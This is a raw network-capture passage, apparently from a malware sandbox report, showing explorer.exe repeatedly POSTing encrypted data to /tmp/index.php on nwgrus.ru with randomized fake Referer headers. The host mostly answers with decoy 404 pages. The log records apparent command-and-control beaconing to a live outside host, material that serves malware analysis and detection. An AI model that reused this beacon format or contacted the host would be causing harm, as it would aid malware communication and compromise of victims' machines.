                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.549916105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:44.981661081 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://dkfsbqntnihxbnlu.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 223
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:44.981683016 CEST223OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 5b 07 b1 ae
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu[VHvcMw!6i|LXk4]A.4.9TAH_d3~SJ&0z*M/RaEb
                                        Oct 7, 2024 14:59:45.906971931 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:45 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.549922105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:46.020895004 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://aiwrtqoespykiwu.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 171
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:46.021135092 CEST171OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 23 0a e1 f8
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu#c}tJm97x"oar0UVd,0YMGMMo*F.`]hj
                                        Oct 7, 2024 14:59:47.047126055 CEST189INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:46 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                        Data Ascii: #\6Y9l_m=rA


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.549939105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:48.526978016 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://isyxarorgwntyxfd.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 186
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:48.526978016 CEST186OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 48 34 e4 95
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA ,[k,vuH4d\Wbo;YaaaYKbjoXY]M2[t6'_7?O=F
                                        Oct 7, 2024 14:59:49.566504955 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:49 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.549945105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:49.618535995 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://busntnknves.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 347
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:49.618563890 CEST347OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 40 38 ef 82
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu@8\>X]:7`:phQ\R"TFHvY-O0GS< SVn_]6i)=9scdXRli;>B
                                        Oct 7, 2024 14:59:50.520540953 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:50 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.2.549952105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:50.586827993 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://ewcutxkdkeyvacp.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 244
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:50.586843967 CEST244OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 67 32 cb e8
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vug2xI3UD${;LvDmXJ7TOGH>DfF,=bU,1@7CtNC=&)bj7Px
                                        Oct 7, 2024 14:59:51.497476101 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:51 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.2.549961105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:51.742364883 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://lwocwqbtqohnf.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 169
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:51.742364883 CEST169OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 74 39 bd 9d
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vut9KLhxgaY?{~ii56Mah![p\F| 6
                                        Oct 7, 2024 14:59:52.660981894 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:52 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.2.549969105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:52.670686960 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://tiisncfdrpaiu.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 361
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:52.670716047 CEST361OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 28 20 f9 f4
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu( E9{@Hsf;W[Ew2D X-Q/NHfUzq';$t* r_t/?D){fIMZ/@eA::
                                        Oct 7, 2024 14:59:53.587590933 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:53 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        29192.168.2.549975105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:53.597395897 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://gieumfrwvwjruuah.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 114
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:53.597424984 CEST114OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 7b 0b fa 8d
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu{SCXtnD3%5Q
                                        Oct 7, 2024 14:59:54.529414892 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:54 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.2.549979105.197.97.247801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 7, 2024 14:59:54.555557013 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: http://hkihwrdtvsi.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 189
                                        Host: nwgrus.ru
                                        Oct 7, 2024 14:59:54.555573940 CEST189OUTData Raw: 3b 6e 25 19 8d bf 1c 2e de a8 b4 06 05 03 79 b7 7f 79 bc 94 63 03 94 10 7d 7e 7a 9d 47 b6 c0 1a e8 5b cf 2e 76 6f 52 6d 9c 97 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 28 58 a1 a5
                                        Data Ascii: ;n%.yyc}~zG[.voRm?#1|J7 M@NA -[k,vu(X6EWiIq%fPovpcDlh 1%(`>fi0Hq;UXVm
                                        Oct 7, 2024 14:59:56.015954018 CEST484INHTTP/1.1 404 Not Found
                                        Server: nginx/1.26.0
                                        Date: Mon, 07 Oct 2024 12:59:55 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Connection: close
